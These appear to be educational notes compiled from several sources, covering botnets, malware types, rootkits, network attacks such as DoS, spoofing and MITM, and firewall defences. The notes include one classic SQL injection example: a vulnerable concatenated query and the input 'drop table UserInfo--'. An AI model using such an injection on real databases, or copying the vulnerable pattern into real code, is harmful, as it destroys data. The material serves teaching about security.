to perform various types of attacks on other computers or networks. A known example of botnet
usage is within the distributed denial of service attack where multiple systems submit as many
request as possible to the victim machine in order to overload it with incoming packets. Botnets
can be otherwise used to send out span, spread viruses and spyware and as well to steal personal
and confidential information which afterwards is being forwarded to the botmaster.
Video: Symantec Guide to Scary Internet Stuff - Botnets

Beginning October 2013 Symantec disabled 500.000 botnet infected computers belonging
to the almost 1.9 milion ZeroAccess botnet. According to Symantec ZeroAccess is the largest
actively controlled botnet in existence today, amounting to approximately 1.9 million infected
computers on any given day. It is the largest known botnet that utilizes a peer-to-peer (P2P)
mechanism for communication. ZeroAccess is a Trojan horse that uses advanced means to hide
itself by creating hidden file systems to store core components, download additional malware,
and open a back door on the compromised computer. The primary motivation behind
ZeroAccess botnet is financial fraud through pay-per-click (PPC) advertising and bitcoin
mining.
Reference:
[Trojan.Zeroaccess]
http://www.symantec.com/security_response/writeup.jsp?docid=2011-071314-0410-99
Grappling with the ZeroAccess Botnet
https://www-secure.symantec.com/connect/blogs/grappling-zeroaccess-botnet
ZeroAccess Indepth
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeroac
cess_indepth.pdf
Press articles:
Symantec disables 500,000 botnet-infected computers
http://www.bbc.co.uk/news/technology-24348395
Symantec seizes part of massive peer-to-peer botnet ZeroAccess
http://www.pcworld.com/article/2050800/symantec-seizes-part-of-massive-peertopeer-botnet-
zeroaccess.html
Symantec takes on one of largest botnets in history
http://news.cnet.com/8301-1009_3-57605411-83/symantec-takes-on-one-of-largest-botnets-in-
history
• Man-in-the-middle Attack - the attack is form of active monitoring or eavesdropping on
victim’s connections and communication between victim hosts. This form of attack includes as
well interaction between both victim parties of the communication and the attacker - this is
achieved by attacker intercepting all part of the communication, changing the content of it and
sending back as legitimate replies. The both speaking parties are here not aware of the attacker
presence and believing the replies they get are legitimate. For this attack to success the
perpetrator must successfully impersonate at least one of the endpoints - this can be the case if
there are no protocols in place that would secure mutual authentication or encryption during the
communication process.

• Session Hijacking Attack - attack targeted as exploit of the valid computer session in order
to gain unauthorized access to information on a computer system. The attack type is often
referenced as cookie hijacking as during its progress the attacker uses the stolen session cookie
to gain access and authenticate to remote server by impersonating legitimate user.

• Cross-side scripting Attack (XSS Attack) - the attacker exploits the XSS vulnerabilities
found in Web Server applications in order to inject a client-side script onto the webpage that can
either point the user to a malicious website of the attacker or allow attacker to steal the user's
session cookie.

• SQL Injection Attack - attacker uses existing vulnerabilities in the applications to inject a
code/string for execution that exceeds the allowed and expected input to the SQL database.

• Bluetooth related attacks


♦ Bluesnarfing - this kind of attack allows the malicious user to gain unauthorized access to
information on a device through its Bluetooth connection. Any device with Bluetooth turned on
and set to "discoverable" state may be prone to bluesnarfing attack.
♦ Bluejacking - this kind of attack allows the malicious user to send unsolicited (often spam)
messages over Bluetooth to Bluetooth enabled devices.
♦ Bluebugging - hack attack on a Bluetooth enabled device. Bluebugging enables the attacker to
initiate phone calls on the victim's phone as well read through the address book, messages and
eavesdrop on phone conversations.

Malware
Malware, short for malicious software, is an umbrella term used to refer to a variety of forms of
hostile or intrusive software,[1] including computer viruses, worms, trojan horses, ransomware,
spyware, adware, scareware, and other malicious programs. It can take the form of executable
code, scripts, active content, and other software.[2] Malware is defined by its malicious intent,
acting against the requirements of the computer user - and so does not include software that
causes unintentional harm due to some deficiency.
Software such as anti-virus and firewalls are used to protect against activity identified as
malicious, and to recover from attacks.[4]
Today, malware is used by both black hat hackers and governments, to steal personal, financial,
or business information.[5][6]
Malware is sometimes used broadly against government or corporate websites to gather guarded
information,[7] or to disrupt their operation in general. However, malware is often used against
individuals to gain information such as personal identification numbers or details, bank or credit
card numbers, and passwords.
Since the rise of widespread broadband Internet access, malicious software has more frequently
been designed for profit. Since 2003, the majority of widespread viruses and worms have been
designed to take control of users' computers for illicit purposes.[8] Infected "zombie computers"
are used to send email spam, to host contraband data such as child pornography,[9] or to engage
in distributed denial-of-service attacks as a form of extortion.[10]
Programs designed to monitor users' web browsing, display unsolicited advertisements, or
redirect affiliate marketing revenues are called spyware. Spyware programs do not spread like
viruses; instead they are generally installed by exploiting security holes. They can also be hidden
and packaged together with unrelated user-installed software.[11]
Ransomware affects an infected computer in some way, and demands payment to reverse the
damage. For example, programs such as CryptoLocker encrypt files securely, and only decrypt
them on payment of a substantial sum of money.
Some malware is used to generate money by click fraud, making it appear that the computer user
has clicked an advertising link on a site, generating a payment from the advertiser. It was
estimated in 2012 that about 60 to 70% of all active malware used some kind of click fraud, and
22% of all ad-clicks were fraudulent.[
The best-known types of malware, viruses and worms, are known for the manner in which they
spread, rather than any specific types of behavior. The term computer virus is used for a program
that embeds itself in some other executable software (including the operating system itself) on
the target system without the user's consent and when that is run causes the virus to spread to
other executables. On the other hand, a worm is a stand-alone malware program that actively
transmits itself over a network to infect other computers. These definitions lead to the
observation that a virus requires the user to run an infected program or operating system for the
virus to spread, whereas a worm spreads itself.[15]

Adwares, Toolbars and Hijackers


Adwares
Adware is a type of malware which download advertisement content from internet and displays advertisements
in the form of pop-ups, pop-unders etc. Once the Adware in installed on computer, they are not dependent on
your browsers and they can display advertisements stand-alone. The pop-up blockers also cannot block these
pop-ups. Adware is always an annoyance to the computer user.

Toolbars
Toolbars are available as plug-ins to browsers which provide additional functionality such as search forms or
pop-up blockers. Examples of useful toolbars are Google Toolbar, Yahoo toolbar, Ask toolbar etc. There are
malware toolbar plug-ins which are installed without the users consent and display advertisements and perform
other nuisance activities.
Hijackers
Hijackers are another type of malware that take control of the behavior of your web browser like the home page,
default search pages, toolbar etc. Hijackers redirect your browser to another URL if you mistype the URL of the
website you want to visit. Hijackers can also prevent you from opening a particular web site. Hijackers are
annoyance to the users who use the browser often.

What are keyloggers - Key stroke logger


A keylogger or keystroke logger is a program or a hardware that logs every keystroke you make
in your computer and then sends that information, including passwords, bank account numbers,
and credit card numbers, to who is controlling the malware.

A hardware key logger is a small hardware device which is normally installed between the
keyboard port and the keyboard. The hardware key logger then track all user keystrokes and save
the keystrokes to it's internal memory. Hardware keyloggers is available in different memory
capacities.

A software keylogger is a program which can track and save all the key strokes of the user in to
computer. Software keyloggers are normally cheaper than hardware keyloggers. The software
keyloggers run invisibly to the user being monitored and hide itself from the Task Manager and
from the Add/Remove Programs. Many software keyloggers support remote installation also.

Computer Viruses
A Computer Virus is another type of malware which when executed tries to replicate itself into
other executable code which is available in the infected computer. If the virus was able to
replicate it to other executable code, it is then infected with the computer virus. When the
infected executable code is executed can infect again other executable codes. The key difference
between virus and other malwares is this self-replication capability.
Normally, viruses propagate within a single computer, or may travel from one computer to
another using storage media like CD-ROM, DVD-ROM, USB flash drive etc.
A Computer Virus program normally has the following mechanisms.
• A propagation mechanism that allows the virus to move from one computer to another
computer.
• A replication mechanism that allows the virus to attach itself to another executable program.
• A trigger mechanism that is designed to execute the replication mechanism of the virus.
• A different tasks to perform the mischievous activities on the victim computer

Different types of Computer Viruses - Computer Virus


Classification
Computer Viruses are classified according to their nature of infection and behavior. Different types of computer
virus classification are given below.

• Boot Sector Virus: A Boot Sector Virus infects the first sector of the hard drive, where the Master Boot Record
(MBR) is stored. The Master Boot Record (MBR) stores the disk's primary partition table and to store
bootstrapping instructions which are executed after the computer's BIOS passes execution to machine code. If a
computer is infected with Boot Sector Virus, when the computer is turned on, the virus launches immediately
and is loaded into memory, enabling it to control the computer.

• File Deleting Viruses: A File Deleting Virus is designed to delete critical files which are the part of Operating
System or data files.

• Mass Mailer Viruses: Mass Mailer Viruses search e-mail programs like MS outlook for e-mail addresses
which are stored in the address book and replicate by e-mailing themselves to the addresses stored in the address
book of the e-mail program.

• Macro viruses: Macro viruses are written by using the Macro programming languages like VBA, which is a
feature of MS office package. A macro is a way to automate and simplify a task that you perform repeatedly in
MS office suit (MS Excel, MS word etc). These macros are usually stored as part of the document or spreadsheet
and can travel to other systems when these files are transferred to another computers.

• Polymorphic Viruses: Polymorphic Viruses have the capability to change their appearance and change their
code every time they infect a different system. This helps the Polymorphic Viruses to hide from anti-virus
software.

• Armored Viruses: Armored Viruses are type of viruses that are designed and written to make itself difficult
to detect or analyze. An Armored Virus may also have the ability to protect itself from antivirus programs,
making it more difficult to disinfect.

• Stealth viruses: Stealth viruses have the capability to hide from operating system or anti-virus software by
making changes to file sizes or directory structure. Stealth viruses are anti-heuristic nature which helps them to
hide from heuristic detection.

• Polymorphic Viruses: Polymorphic viruses change their form in order to avoid detection and disinfection by
anti-virus applications. After the work, these types of viruses try to hide from the anti-virus application by
encrypting parts of the virus itself. This is known as mutation.

• Retrovirus: Retrovirus is another type virus which tries to attack and disable the anti-virus application running
on the computer. A retrovirus can be considered anti-antivirus. Some Retroviruses attack the anti-virus
application and stop it from running or some other destroys the virus definition database.

• Multiple Characteristic viruses: Multiple Characteristic viruses has different characteristics of viruses and
have different capabilities.

Computer Worms, different types of computer worms


A worm has similar characteristics of a virus. Worms are also self-replicating, but self-
replication of a worm is in a different way. Worms are standalone and when it is infected on a
computer, it searches for other computers connected through a local area network (LAN) or
Internet connection. When a worm finds another computer, it replicates itself to the new
computer and continues to search for other computers on the network to replicate.
Due to the nature of replication through the network, a worm normally consumes much system
resources including network bandwidth, causing network servers to stop responding.
Different types of Computer Worms are:

• Email Worms: Email Worms spread through infected email messages as an attachment or a
link of an infected website.
• Instant Messaging Worms: Instant Messaging Worms spread by sending links to the contact
list of instant messaging applications.
• Internet Worms: Internet worm will scan all available network resources using local operating
system services and/or scan the Internet for vulnerable machines. If a computer is found
vulnerable it will attempt to connect and gain access to them.
• IRC Worms: IRC Worms spread through IRC chat channels, sending infected files or links to
infected websites.
• File-sharing Networks Worms: File-sharing Networks Worms place a copy of them in a shared
folder and spread via P2P network.

Rootkits, Different types of rootkits


A rootkit is another type of malware that has the capability to conceal itself from the Operating System and
antivirus application in a computer. A rootkit provide continuous root level (super user) access to a computer
where it is installed. The name rootkit came from the UNIX world, where the super user is "root" and a kit.

Rootkits are installed by an attacker for a variety of purposes. Root kits can provide the attacker root level
access to the computer via a back door, rootkits can conceal other malwares which are installed on the target
computer, rootkits can make the installed computer as a zombie computer for network attacks, Rootkits can
be used to hack encryption keys and passwords etc. Rootkits are more dangerous than other types of malware
because they are difficult to detect and cure.

Different types of Rootkits are explained below.

Application Level Rootkits: Application level rootkits operate inside the victim computer by changing
standard application files with rootkit files, or changing the behavior of present applications with patches,
injected code etc.

Kernel Level Rootkits: Kernel is the core of the Operating System and Kernel Level Rootkits are created by
adding additional code or replacing portions of the core operating system, with modified code via device
drivers (in Windows) or Loadable Kernel Modules (Linux). Kernel Level Rootkits can have a serious effect
on the stability of the system if the kit’s code contains bugs. Kernel rootkits are difficult to detect because they
have the same privileges of the Operating System, and therefore they can intercept or subvert operating system
operations.

Hardware/Firmware Rootkits: Hardware/Firmware rootkits hide itself in hardware such a network card,
system BIOS etc.

Hypervisor (Virtualized) Level Rootkits: Hypervisor (Virtualized) Level Rootkits are created by exploiting
hardware features such as Intel VT or AMD-V (Hardware assisted virtualization technologies). Hypervisor
level rootkits hosts the target operating system as a virtual machine and therefore they can intercept all
hardware calls made by the target operating system.

Boot loader Level (Bootkit) Rootkits: Boot loader Level (Bootkit) Rootkits replaces or modifies the
legitimate boot loader with another one thus enabling the Boot loader Level (Bootkit) to be activated even
before the operating system is started. Boot loader Level (Bootkit) Rootkits are serious threat to security
because they can be used to hack the encryption keys and passwords.

Viruses [edit]
Main article: Computer virus
A computer program usually hidden within another seemingly innocuous program that produces
copies of itself and inserts them into other programs or files, and that usually performs a
malicious action (such as destroying data).[17]
Trojan horses [edit]
Main article: Trojan horse (computing)
A trojan, is a malicious computer program which misrepresents itself to appear useful, routine,
or interesting in order to persuade a victim to install it. The term is derived from the Ancient
Greek story of the Trojan Horse used to invade the city of Troy by stealth.[18][19][20][21][22]
Trojans are generally spread by some form of social engineering, for example where a user is
duped into executing an e-mail attachment disguised to be unsuspicious, (e.g., a routine form to
be filled in), or by drive-by download. Although their payload can be anything, many modern
forms act as a backdoor, contacting a controller which can then have unauthorized access to the
affected computer.[23] While Trojans and backdoors are not easily detectable by themselves,
computers may appear to run slower due to heavy processor or network usage.
Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into
other files or otherwise propagate themselves.[24]
Rootkits [edit]
Main article: Rootkit
Once a malicious program is installed on a system, it is essential that it stays concealed, to avoid
detection. Software packages known as rootkits allow this concealment, by modifying the host's
operating system so that the malware is hidden from the user. Rootkits can prevent a malicious
process from being visible in the system's list of processes, or keep its files from being read.[25]
Some malicious programs contain routines to defend against removal, not merely to hide
themselves. An early example of this behavior is recorded in the Jargon File tale of a pair of
programs infesting a Xerox CP-V time sharing system:
Each ghost-job would detect the fact that the other had been killed, and would start a new copy
of the recently stopped program within a few milliseconds. The only way to kill both ghosts was
to kill them simultaneously (very difficult) or to deliberately crash the system.[26]
Backdoors[edit]
Main article: Backdoor (computing)
A backdoor is a method of bypassing normal authentication procedures, usually over a
connection to a network such as the Internet. Once a system has been compromised, one or more
backdoors may be installed in order to allow access in the future,[27] invisibly to the user.
The idea has often been suggested that computer manufacturers preinstall backdoors on their
systems to provide technical support for customers, but this has never been reliably verified. It
was reported in 2014 that US government agencies had been diverting computers purchased by
those considered "targets" to secret workshops where software or hardware permitting remote
access by the agency was installed, considered to be among the most productive operations to
obtain access to networks around the world.[28] Backdoors may be installed by Trojan horses,
worms, implants, or other methods.[29][30]
Evasion[edit]
Since the beginning of 2015, a sizable portion of malware utilizes a combination of many
techniques designed to avoid detection and analysis.[31]
• The most common evasion technique is when the malware evades analysis and detection
by fingerprinting the environment when executed.[32]
• The second most common evasion technique is confusing automated tools' detection
methods. This allows malware to avoid detection by technologies such as signature-based
antivirus software by changing the server used by the malware.[33]
• The third most common evasion technique is timing-based evasion. This is when
malware runs at certain times or following certain actions taken by the user, so it executes
during certain vulnerable periods, such as during the boot process, while remaining
dormant the rest of the time.
• The fourth most common evasion technique is done by obfuscating internal data so that
automated tools do not detect the malware.[34]
• An increasingly common technique is adware that uses stolen certificates to disable anti-
malware and virus protection; technical remedies are available to deal with the adware.[35]
Nowadays, one of the most sophisticated and stealthy ways of evasion is to use information
hiding techniques, namely stegomalware.

Routing
Routing is the process of selecting a path for traffic in a network, or between or across multiple
networks. Routing is performed for many types of networks, including circuit-switched
networks, such as the public switched telephone network (PSTN), computer networks, such as
the Internet, as well as in networks used in public and private transportation, such as the system
of streets, roads, and highways in national infrastructure.
In packet switching networks, routing is the higher-level decision making that directs network
packets from their source toward their destination through intermediate network nodes by
specific packet forwarding mechanisms. Packet forwarding is the transit of logically addressed
network packets from one network interface to another. Intermediate nodes are typically network
hardware devices such as routers, bridges, gateways, firewalls, or switches. General-purpose
computers also forward packets and perform routing, although they have no specially optimized
hardware for the task. The routing process usually directs forwarding on the basis of routing
tables, which maintain a record of the routes to various network destinations. Thus, constructing
routing tables, which are held in the router's memory, is very important for efficient routing.
Most routing algorithms use only one network path at a time. Multipath routing techniques
enable the use of multiple alternative paths.
Routing, in a narrower sense of the term, is often contrasted with bridging in its assumption that
network addresses are structured and that similar addresses imply proximity within the network.
Structured addresses allow a single routing table entry to represent the route to a group of
devices. In large networks, structured addressing (routing, in the narrow sense) outperforms
unstructured addressing (bridging). Routing has become the dominant form of addressing on the
Internet. Bridging is still widely used within localized environments.
Routing schemes differ in how they deliver messages:
• unicast delivers a message to a single specific node
• anycast delivers a message to any one out of a group of nodes, typically the one nearest to
the source
• multicast delivers a message to a group of nodes that have expressed interest in receiving
the message
• geocast delivers a message to a geographic area
• broadcast delivers a message to all nodes in the network
Unicast is the dominant form of message delivery on the Internet. This article focuses on unicast
routing algorithms.
Introduction to AAA
AAA stands for Authentication, Authorization and Accounting. AAA are a set of primary
concepts that aid in understanding computer and network security as well as access control.
These concepts are used daily to protect property, data, and systems from intentional or even
unintentional damage. AAA is used to support the Confidentiality, Integrity, and Availability
(CIA) security concept.
Confidentiality: The term confidentiality means that the data which is confidential should remain
confidential. In other words, confidentiality means secret should stay secret.
Integrity: The term integrity means that the data being worked with is the correct data, which is
not tampered or altered.
Availability: The term availability means that the data you need should always be available to
you.
Authentication provides a way of identifying a user, typically requiring a Userid/Password
combo before granting a session. Authentication process controls access by requiring valid user
credentials. After the Authentication process is completed successfully, a user must be given
authorization (permission) for carrying out tasks within the server. Authorization is the process
that determines whether the user has the authority to carry out a specific task. Authorization
controls access to the resources after the user has been authenticated. The last one is Accounting.
Accounting keeps track of the activities the user has performed in the server.

Types of Network Attacks

• Denial of Service (DoS) attack

The idea of DOS attack is to reduce the quality of service offered by server, or to crash server with
heavy work load. DoS (Denial of Service) attack does not involve breaking into the target server. This
is normally achieved by either overloading the target network or target server, or by sending network
packets that that may cause extreme confusion at target network or target server.

A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate


users of a service from using that service. Some of the examples are

• Attempts to "flood" a network, thereby preventing legitimate network traffic.

• Attempts to disrupt connections between two machines, thereby preventing access to a service.

• Attempts to prevent a particular individual from accessing a service.

• Attempts to disrupt service to a specific system or person.

One simple DoS (Denial of Service) attack was called the "Ping of Death." The Ping of Death was
able to exploit simple TCP/IP troubleshooting ping tool. Using ping tool, hackers would flood a
network with large packet requests that may ultimately crash the target server.

• Distributed Denial of Service (DDoS) attack


A Distributed Denial of Service (DDoS) attack is a type of Denial of Service (DoS). In Distributed
Denial of Service (DDoS) attack multiple systems flood the bandwidth or overload the resources of a
targeted server.

In Distributed Denial of Service (DDoS), an intruder compromise one computer and make it
Distributed Denial of Service (DDoS) master. Using this Distributed Denial of Service (DDoS)
master, the intruder identifies and communicates with other systems that can be compromised.
Then the intruder installs Distributed Denial of Service (DDoS) tools on all compromised systems.
With a single command, the intruder instructs the compromised computers to launch flood attacks
against the target server. Here thousands of compromised computers are flooding or overloading
the resources of the target server preventing the legitimate users from accessing the services offered
by the server.

• SYN attack

Before understanding what SYN attack is, we need to know about TCP/IP three-way handshake
mechanism. Transmission Control Protocol/Internet Protocol (TCP/IP) session is initiated with a
three-way handshake. The two communicating computers exchange a SYN, SYN/ACK and ACK to
initiate a session. The initiating computer sends a SYN packet, to which the responding host will issue
a SYN/ACK and wait for an ACK reply from the initiator. Click the following link to learn more
about TCP/IP three-way handshake mechanism.

The SYN flood attack is the most common type of flooding attack. The attack occurs when the
attacker sends large number of SYN packets to the victim, forcing them to wait for replies that never
come. The third part of the TCP three-way handshake is not executed. Since the host is waiting for
large number of replies, the real service requests are not processed, bringing down the service. The
source address of these SYN packets in a SYN flood attack is typically set to an unreachable host. As
a result it is impossible to find the attacking computer.

SYN cookies provide protection against the SYN flood. A SYN cookie is implemented by using a
specific initial TCP sequence number by TCP software and is used as a defense against SYN Flood
attacks. By using stateful firewalls which reset the pending TCP connections after a specific
timeout, we can reduce the effect of SYN attack

• Sniffer Attack

Sniffer is an application that can capture network packets. Sniffers are also known as network
protocol analyzers. While protocol analyzers are really network troubleshooting tools, they are also
used by hackers for hacking network. If the network packets are not encrypted, the data within the
network packet can be read using a sniffer. Sniffing refers to the process used by attackers to capture
network traffic using a sniffer. Once the packet is captured using a sniffer, the contents of packets
can be analyzed. Sniffers are used by hackers to capture sensitive network information, such as
passwords, account information etc.
Many sniffers are available for free download. Leading packet sniffers are wireshark, Dsniff,
Etherpeek, sniffit etc.

• Man-In-The-Middle (MITM) attack

Man-In-The-Middle (MITM) attack is the type of attack where attackers intrude into an existing
communication between two computers and then monitor, capture, and control the communication.
In Man-in-the-middle attack, an intruder assumes a legitimate users identity to gain control of the
network communication. The other end of the communication path might believe it is you and keep
on exchanging the data.

Man-in-the-Middle (MITM) attacks are also known as "session hijacking attacks", which means that
the attacker hijacks a legitimate user's session to control the communication.

Many preventive methods are available for Man-In-The-Middle (MITM) attack and some are listed
below.

• Public Key Infrastructure (PKI) technologies,

• Verifying delay in communication

• Stronger mutual authentication

• IP Address Spoofing Attack

IP address spoofing is a type of attack when an attacker assumes the source Internet Protocol (IP)
address of IP packets to make it appear as though the packet is coming from another valid IP address.
In IP address spoofing, IP packets are generated with fake source IP addresses in order to
impersonate other systems or to protect the identity of the sender.

To explain this clearly, in IP address spoofing, the IP address information placed on the source field
of the IP header is not the real IP address of the source computer, where the packet was originated.
By changing the source IP address, the actual sender can make it look like the packet was sent by
another computer and therefore the response from the target computer will be sent to the fake
address specified in the packet and the identity of tha attacker is also protected.

Packet filtering is a method to prevent IP spoofing attacks. Blocking of packets from outside the
network with a source address inside the network (ingress filtering) and blocking of packets from
inside the network with a source address outside the network (egress filtering) can help preventing
IP spoofing attacks.

• ARP (Address Resolution Protocol) Spoofing Attacks


A computer connected to an IP/Ethernet Local Area Network has two addresses. One is the MAC
(Media Access Control) which is a globally unique and unchangeable address which is burned on the
network card itself. MAC addresses are necessary so that the Ethernet protocol can send data back
and forth, independent of whatever application protocols are used on top of it. Ethernet send and
receive data based on MAC addresses. MAC address is also known as Layer2 address, physical
address or Hardware address.

Other address is the IP address. IP is a protocol used by applications, independent of whatever


network technology operates underneath it. Each computer on a network must have a unique IP
address to communicate. Applications use IP address to communicate. IP address is also known as
Layer 3 address or Logical address.

To explain it more clearly, the applications use IP address for communication and the low lying
hardware use MAC address for communication. If an application running on a computer need to
communicate with another computer using IP address, the first computer should resolve the MAC
address of the second computer, because the lower layer Ethernet technologies use MAC addresses
to deliver data. Click the following link to learn more about ARP (Address Resolution Protocol).

Operating Systems keep a cache of ARP replies to minimize the number of ARP requests. ARP is a
stateless protocol and most operating systems will update their cache if a reply is received, regardless
of whether they have sent out an actual request.

ARP (Address Resolution Protocol) Spoofing attacks (ARP flooding or ARP poisoning) help an
attacker to sniff data frames on a local area network (LAN), modify the traffic etc. ARP Spoofing
attacks are made by sending fake ARP messages to an Ethernet LAN. The purpose of this is to
associate the attacker's MAC address with the IP address of another computer, generally the
default gateway. Here any traffic sent to the default gateway would be mistakenly sent to the
attacker instead. The attacker can then forward the traffic to the actual default gateway after
sniffing or modify the data before forwarding it

• DNS (Domain Name System) Spoofing Attacks

DNS is the short for Domain Name System. DNS is a required service in TCP/IP networks and it
translates domain names into IP addresses. Computers in the network communicate using IP
address. IP addresses are a 32 bit numbers which are difficult to remember. Domain names are
alphabetic and for humans they are easier to remember. When we use a domain name to
communicate with another host, DNS service must translate the name into the corresponding IP
address.

DNS Servers keep a database of domain names and corresponding IP addresses. DNS Spoofing
attacks are made by changing a domain name entry of a legitimate server in the DNS server to point
to some IP other than it, and then hijacking the identity of the server.
Generally there are two types of DNS poisoning attacks; DNS cache poisoning and DNS ID Spoofing.

In DNS cache poisoning a DNS server is made to cache entries which are not originated from
authoritative Domain Name System (DNS) sources. IN DNS ID spoofing, an attacker hack the
random identification number in DNS request and reply a fake IP address using the hacked
identification number.

• Phishing and Pharming Spoofing attacks

Phishing spoofing attack is a combination of e-mail spoofing and Web site spoofing attack. Phishing
attacker starts the phishing attack by sending bulk e-mails impersonating a web site they have
spoofed. Normally the phishing attack emails seems to be from legitimate financial organizations like
banks, alerting the user that they need to login to their account for one reason or another. The link
also will be provided in the email which is a fake web site, which is designed very similar to the bank
web site. Normally the link’s anchor text will be the real URL of the bank’s website but anchor will
be a URL with IP address of the web site which is in attacker’s control. Once the user enters the
userid/password combination and submits those values, the attacker collect those values and the web
page is redirected to the real site.

Pharming is another spoofing attack, where the attacker tampers the DNS (Domain Name System)
so that traffic to a Web site is secretly redirected to a fake site altogether, even though the browser
seems to be displaying the Web address you wanted to visit

• Backdoor Attacks

A backdoor in an Operating System or a complex application is a method of bypassing normal


authentication and gain access. During the development of an Operating System or application,
programmers add back doors for different purposes. The backdoors are removed when the product
is ready for shipping or production. When a backdoor is detected, which is not removed, the vendor
releases a maintenance upgrade or patch to close the back door.

Another type of back door can be an installed program or could be a modification to an existing
program. The installed program may allow a user log on to the computer without a password with
administrative privileges. Many programs ara available on internet to create back door attacks on
systems. One of the more popular tools is Back Orifice which is also available for free download on
internet

• Password Guessing Attacks

Another type of network attack is Password Guessing attack. Here a legitimate users access rights to
a computer and network resources are compromised by identifying the user id/password
combination of the legitimate user.

Password guessing attacks can be classified into two.


Brute Force Attack: A Brute Force attack is a type of password guessing attack and it consists of
trying every possible code, combination, or password until you find the correct one. This type of
attack may take long time to complete. A complex password can make the time for identifying the
password by brute force long.

Dictionary Attack: A dictionary attack is another type of password guessing attack which uses a
dictionary of common words to identify the user’s password

• SQL Injection Attacks

SQL injection attack is another type of attack to exploit applications that use client-supplied data in
SQL statements. Here malicious code is inserted into strings that are later passed to database
application for parsing and execution. The common method of SQL injection attack is direct insertion
of malicious code into user-input variables that are concatenated with SQL commands and executed.
Another type of SQL injection attack injects malicious code into strings and are stored in tables. An
SQL injection attack is made later by the attacker.

Following example shows the simplest form of SQL injection.

var UserID;
UserID = Request.form ("UserID");
var InfoUser = "select * from UserInfo where UserID = '" + UserID + "'";

If the user fills the field with correct information of his UserID (F827781), after the script execution
the above SQL query will look like

SELECT * FROM UserInfo WHERE UserID = 'F827781'

Consider a case when a user fills the field with the below entry.

F827781; drop table UserInfo--

After the execution of the script, the SQL code will look like

SELECT * FROM UserInfo WHERE UserID = ' F827781';drop table UserInfo--

This will ultimately result in deletion of table UserInfo

Defense against Network Attack


Configuration Management
The main weapon in network attack defense is tight configuration management. The following
measures should be strictly implemented as part of configuration management.
• If the machines in your network should be running up-to-date copies of the operating system
and they are immediately updated whenever a new service pack or patch is released.
• All your configuration files in your Operating Systems or Applications should have enough
security.
• All the default passwords in your Operating Systems or Applications should be changed after
the installation.
• You should implement tight security for root/Administrator passwords.
Firewalls
Another weapon for defense against network attack is Firewall. Firewall is a device and/or a
software that stands between a local network and the Internet, and filters traffic that might be
harmful. Firewalls can be classified in to four based on whether they filter at the IP packet level,
at the TCP session level, at the application level or hybrid.
1. Packet Filtering: Packet filtering firewalls are functioning at the IP packet level. Packet
filtering firewalls filters packets based on addresses and port number. Packet filtering firewalls
can be used as a weapon in network attack defense against Denial of Service (DoS) attacks and
IP Spoofing attacks.
2. Circuit Gateways: Circuit gateways firewalls operate at the transport layer, which means that
they can reassemble, examine or block all the packets in a TCP or UDP connection. Circuit
gateway firewalls can also Virtual Private Network (VPN) over the Internet by doing encryption
from firewall to firewall.
3. Application Proxies: Application proxy-based firewalls function at the application level. At
this level, you can block or control traffic generated by applications. Application Proxies can
provide very comprehensive protection against a wide range of threats.
4. Hybrid: A hybrid firewall may consist of a pocket filtering combined with an application
proxy firewall, or a circuit gateway combined with an application proxy firewall.
Encryption
Encryption is another great weapon used in defense against network attacks. Click the following
link to get a basic idea of encryption.
Encryption can provide protection against eavesdropping and sniffer attacks. Private Key
Infrastructure (PKI) Technologies, Internet Protocol Security (IPSec), and Virtual Private
Networks (VPN) when implemented properly, can secure you network against network attacks.
Other tips for defense against network attack are
• Privilege escalation at different levels and strict password policies
• Tight physical security for all your machines, especially servers.
• Tight physical security and isolation for your back up data.

Introduction to Infrastructure Security

Network Infrastructure includes networks, network devices, servers, workstations, and other devices. The
software running on these devices are also the part of Network Infrastructure. To make sure your network is
secure, you should make sure every time a configuration is changed or new device is added, you are not
creating a hole in your security. A normal network comprise of routers, firewalls, switches, servers and
workstations. A typical layout of network infrastructure devices is shown below.

Firewalls, Packet Filtering Firewalls, Circuit Gateways,


Application Firewalls (Proxies), Hybrid Firewalls
A firewall is a hardware and/or software which functions in a networked environment to block
unauthorized access while permitting authorized communications. Firewall is a device and/or a
sotware that stands between a local network and the Internet, and filters traffic that might be
harmful. Firewalls can be either stand-alone systems or included in other devices such as routers
or servers.

Hardware firewalls are separate devices which function as dedicated firewalls (They also contain
software but normally stored in ROM to prevent tampering). Cisco and Checkpoint are the two
leading companies which make hardware firewalls.

Software firewalls can be installed on servers or workstations and they help to prevent unwanted
inbound and outbound traffic. Microsoft ISA Server, Zone Alarm, Comodo etc are some leading
software based firewalls. Linux Operating System include and Open Source firewall
called iptables.

Firewalls can be classified in to four based on whether they filter at the IP packet level, at the
TCP session level, at the application level or hybrid.

1. Packet Filtering Firewalls: Packet filtering firewalls are functioning at the IP packet level.
Packet filtering firewalls filters packets based on addresses and port number. Packet filtering
firewalls can be used as a weapon in network attack defense against Denial of Service (DoS)
attacks and IP Spoofing attacks.

2. Circuit Gateways: Circuit gateways firewalls operate at the transport layer, which means that
they can reassemble, examine or block all the packets in a TCP or UDP connection. Circuit
gateway firewalls can also Virtual Private Network (VPN) over the Internet by doing encryption
from firewall to firewall.

3. Application Level Firewalls (Proxies): Application proxies are configured in multi-homed


server and they are often used instead of router-based traffic controls, to prevent traffic from
passing directly between networks. Application proxy-based firewalls function at the application
level. At this level, you can block or control traffic generated by applications. Application-Level
Firewalls can enforce correct application behavior, and can help to block malicious. Application-
Level Firewalls can log user activity also. Application-level firewalls may also include
protection against spam and viruses. Application-Level Firewalls can block Web sites based on
its content rather than just IP address. Application Proxies can provide very comprehensive
protection against a wide range of threats.

4. Hybrid Firewalls: A hybrid firewall may consist of a pocket filtering combined with an
application proxy firewall, or a circuit gateway combined with an application proxy firewall.

What is a router and the functions of router?


A router is another network infrastructure device that directs packets through the network based
on information from Network Layer (Layer 3) of OSI model. A router uses a combination of
hardware and software to "route" data from its source to its destination. A router can be configured
to route data packets from different network protocols, like TCP/IP, IPX/SPX, and AppleTalk.
Click the following link to learn more about routers.

Routers segment large networks into logical segments called subnets. The division of the network
is based on the Layer 3 addressing system, like IP addresses. If the Network Layer (Layer 3) Data
packet (IP Datagram) is addressed to another device on the local subnet, the packet does not cross
the router and create a traffic congestion problem in another network. If data is addressed to a
computer outside the subnet, the router forwards the data to the addressed network. Thus routing
of network data helps conserve network bandwidth.

Routers are the first line of defense for your netwprk and they must be configured to pass only
traffic that is authorized by the network administrators. Thus a router can function as a firewall if
it’s configured properly.

